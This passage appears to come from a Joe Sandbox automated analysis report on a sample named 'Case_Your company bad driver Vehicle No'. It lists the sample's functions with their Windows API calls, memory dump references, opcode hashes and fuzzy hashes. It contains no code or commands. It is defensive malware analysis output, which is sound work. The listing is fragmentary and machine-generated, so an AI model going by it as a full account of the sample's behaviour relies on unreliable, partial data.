SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00BB5CF6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a287b0754bf9bc779254c3deea2b33534fd67be0a2a241d52e9e09ad27f170e7
Instruction ID: 981b4e631fefd613973c1eece1d77d539337dd65b9b1e2d035d102464a454ba5
Opcode Fuzzy Hash: a287b0754bf9bc779254c3deea2b33534fd67be0a2a241d52e9e09ad27f170e7
Instruction Fuzzy Hash: 71313E71A00B09ABCB28DF29C484BADB7F6FF48310F148669D81993750D7B1B950DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BF00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00BF00E1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 70d66a0221bc46dc139df23bc23155c694cfe5390d4cb14de2e9f76ec5164a1f
Instruction ID: 369393244dea99f641cdee6d36c9989b5dccf2d36fb1a2d70a29772e050a02cc
Opcode Fuzzy Hash: 70d66a0221bc46dc139df23bc23155c694cfe5390d4cb14de2e9f76ec5164a1f
Instruction Fuzzy Hash: AE41F674908341DFDB24DF14C484B6ABBE0FF45318F1988ACE9995B762D372E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00BBC73D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: ec8579df75ef5dbb376b6c6d737e11a8738d61b386cddd9763289479928e718f
Instruction ID: b44d775a945b778855cc2fb7194db080b8287c9369aa9a98035fe35924294876
Opcode Fuzzy Hash: ec8579df75ef5dbb376b6c6d737e11a8738d61b386cddd9763289479928e718f
Instruction Fuzzy Hash: DC119071904119DBCB14EBAADC819FEFBF8EF90350F1045A6E911A7190EB709D05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00BB4D4D

Part of subcall function 00BD548B: __wfsopen.LIBCMT ref: 00BD5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BB4F6F

Part of subcall function 00BB4CC8: FreeLibrary.KERNEL32(00000000), ref: 00BB4D02

Part of subcall function 00BB4DD0: _memmove.LIBCMT ref: 00BB4E1A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: e2e301826229abe00c277416a8f01e30977c834eb4b89483f0e1ce104010e702
Instruction ID: ce28d20cf0c2a9cc01a00a7f3255cfc52af05173831378af9f2a47bff0b9a5d1
Opcode Fuzzy Hash: e2e301826229abe00c277416a8f01e30977c834eb4b89483f0e1ce104010e702
Instruction Fuzzy Hash: B011C431600609ABCB24BF70CC52BFE77E5AF40700F108879F545A7282DBF19A059B91

Uniqueness

Uniqueness Score: -1.00%

Function 00BF01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00BF01BB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 60b07b2c8a6667a4d94d37e8c2bb2226834ed89cf60e731bd564d5fbc281d4ef
Instruction ID: 9396c3b6b768128ff09e5079608dadef4c4937a5c5d3b9cd09a27ccd260fcb9a
Opcode Fuzzy Hash: 60b07b2c8a6667a4d94d37e8c2bb2226834ed89cf60e731bd564d5fbc281d4ef
Instruction Fuzzy Hash: 012124B4908341DFCB24EF14C484B6ABBE0FF84304F0589ACE98A57722D771E849CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC6AE Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00BBC73D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: bf980bb666e2796e023d2bed64ace091e5756a48346eef35dd1dc251895c607d
Instruction ID: 569f1ba8f1235ee83b2b84dda6a8c932f19e4360b9c61f7b0b714e70de80b8a5
Opcode Fuzzy Hash: bf980bb666e2796e023d2bed64ace091e5756a48346eef35dd1dc251895c607d
Instruction Fuzzy Hash: 9F1129B2D087899FD7029B249C605EAFFB19F57314F19409BD850AB253E3645C43CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00BB5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00BB5D76

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 698c8872e39df0a33eb4cdc14f6052e6edcddf2343c6492cf4dd7c8aa4b1e1a5
Instruction ID: e5b1d0f94fdb182fc2b50a6a83caaa22d50cb3b9d4f9847f4c666df08bb1ac42
Opcode Fuzzy Hash: 698c8872e39df0a33eb4cdc14f6052e6edcddf2343c6492cf4dd7c8aa4b1e1a5
Instruction Fuzzy Hash: 83113631200B059FD3308F15D888FA6B7E9EF45760F10CA6EE5AA86A50D7B1E945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BD4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00BD4AD6

Part of subcall function 00BD8D68: __getptd_noexit.LIBCMT ref: 00BD8D68

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 36c3f5213ab994b15b4b37d2c099b62c901b34e3b98d449372c73406887d4228
Instruction ID: 11571560932a5ca6c99188ebbca69fde8d8b582ca6fa845cd6864a6c2234dd43
Opcode Fuzzy Hash: 36c3f5213ab994b15b4b37d2c099b62c901b34e3b98d449372c73406887d4228
Instruction Fuzzy Hash: DEF0AF35940209ABDF61AF65CC0639FB7E1AF00326F148597B424AA3E1FB788A50DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00C762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BB4FDE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: f408089b4becf41857ad15dda2fb0bb59621f6a4bfcd59ea46f07cd5e8caf3b0
Instruction ID: df85e112263f14cf7ce4c16a856eee75609a315b2b1857c430aacc088305b3c8
Opcode Fuzzy Hash: f408089b4becf41857ad15dda2fb0bb59621f6a4bfcd59ea46f07cd5e8caf3b0
Instruction Fuzzy Hash: 36F03971505712CFCB349F64E4949B6BBE1FF143293208ABEE1DA83612C7B1A840DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00BD09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BD09F4

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: cb32f258ab07378c4fbcc4b03332a6ccfe4ba7d60564b25fa9221d03e3cc9355
Instruction ID: f55fe143e1a046b4e47966b54a91eb9e4e3f7fb424192bc27fc6b7849ab6069b
Opcode Fuzzy Hash: cb32f258ab07378c4fbcc4b03332a6ccfe4ba7d60564b25fa9221d03e3cc9355
Instruction Fuzzy Hash: 97E08676D4422857C720D6689C05FFA77EDDF88690F0401F5FC0CD7244D9A19C818690

Uniqueness

Uniqueness Score: -1.00%

Function 00C19129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C1914B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 447bc738e422d9a4aed8a448cf97e34857cf477d3f27ddd03e8ce215d2b94b84
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 12E092B1104B009FD7348A24D810BE3B3E0EB06315F00085DF2EA83341EB6378819759

Uniqueness

Uniqueness Score: -1.00%

Function 015108E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 015108EB

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 75250ae0e5bdcbbba94365f94f8adaff36b8c1256afa2da534b5e7689fd1f701
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 2BE0867150530CEBF711CBBC88146AE77A8E704310F004B54F915CB1C9D63489809654

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00BEE16B,?,?,00000000), ref: 00BB5DBF

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: efcc462f7f338caeff3149fe5b191e39328c086c32267c716ee1e8f880d63b55
Instruction ID: b15f1326a8d84caa4fb23d0d399c53dd935691863529111c11dfe9f818e367a6
Opcode Fuzzy Hash: efcc462f7f338caeff3149fe5b191e39328c086c32267c716ee1e8f880d63b55
Instruction Fuzzy Hash: 5DD0C77465020CBFEB10DB80DC46FAD777CD705710F100194FD0456290D6F27D508795

Uniqueness

Uniqueness Score: -1.00%

Function 015108B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 015108BB

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: bbde7bff9a843cf9a4b4f06d5ca8b6869f8f0d1c3549f9972b6eeb1c5f153369
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 30D0A73090A20CFBDB10CFB89D04ADE73A8EB04330F004B54FD15D72C1D63199819790

Uniqueness

Uniqueness Score: -1.00%

Function 00BD548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00BD5496

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 2ff8238c538644d25b3377f09aeb0d2d3368df341ce21e3bd9a0a3eb019b6e2a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: D6B0927684020C77DE112E82EC02A597B599B40679F808061FB0C18262A673A6A09A8A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00C1D46A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6fde69384c30f15a9abeead7a99a70ea39197fab8c72d248d21a36817466feb6
Instruction ID: 8cc87364cc4c67c3dba56f6df732447beff2ededdf00bade3e0b83e3926af572
Opcode Fuzzy Hash: 6fde69384c30f15a9abeead7a99a70ea39197fab8c72d248d21a36817466feb6
Instruction Fuzzy Hash: 297182302043028FC714EF24C491BEAB7E1AF89314F0449ADF5969B2A2DF70EE49DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00BD0EF7

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 53c57ced75e5f203aaccb68efa027078754fc4852935504e7c0acafa3c1eba9d
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6731C170A14105DBC718EF59D480A69FBE6FB99300F648AE6E409CB751E731EDC1CB80

Uniqueness

Uniqueness Score: -1.00%

Function 015122FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01512311

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 49e5b63ce2ea0968fa802800bde98a98e20b905b1a511343a1c319a17cc878b4
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 2BE09A7494010DAFDB01EFA4D54969E7BB4EF04301F1005A1FD0596681DA309A548A62

Uniqueness

Uniqueness Score: -1.00%

Function 01512300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01512311

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 09e28c0baa57757e92caebc80495b3da4ca06d1cdc66d9c775d57f2c24ec74b7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 32E0E67494010DDFDB00EFF4D54969E7FB4FF04301F100561FD01D2281D6309D508A62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C3CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C3CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C3CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C3CF00
SendMessageW.USER32 ref: 00C3CF29
_wcsncpy.LIBCMT ref: 00C3CFA1
GetKeyState.USER32(00000011), ref: 00C3CFC2
GetKeyState.USER32(00000009), ref: 00C3CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3CFE5
GetKeyState.USER32(00000010), ref: 00C3CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C3D018
SendMessageW.USER32 ref: 00C3D03F
SendMessageW.USER32(?,00001030,?,00C3B602), ref: 00C3D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C3D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C3D16E
SetCapture.USER32(?), ref: 00C3D177
ClientToScreen.USER32(?,?), ref: 00C3D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C3D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C3D203
ReleaseCapture.USER32 ref: 00C3D20E
GetCursorPos.USER32(?), ref: 00C3D248
ScreenToClient.USER32(?,?), ref: 00C3D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C3D2B1
SendMessageW.USER32 ref: 00C3D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C3D31C
SendMessageW.USER32 ref: 00C3D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C3D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C3D37B
GetCursorPos.USER32(?), ref: 00C3D39B
ScreenToClient.USER32(?,?), ref: 00C3D3A8
GetParent.USER32(?), ref: 00C3D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C3D431
SendMessageW.USER32 ref: 00C3D462
ClientToScreen.USER32(?,?), ref: 00C3D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C3D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C3D51A
SendMessageW.USER32 ref: 00C3D53D
ClientToScreen.USER32(?,?), ref: 00C3D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C3D5C3

Part of subcall function 00BB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BB25EC

GetWindowLongW.USER32(?,000000F0), ref: 00C3D65F

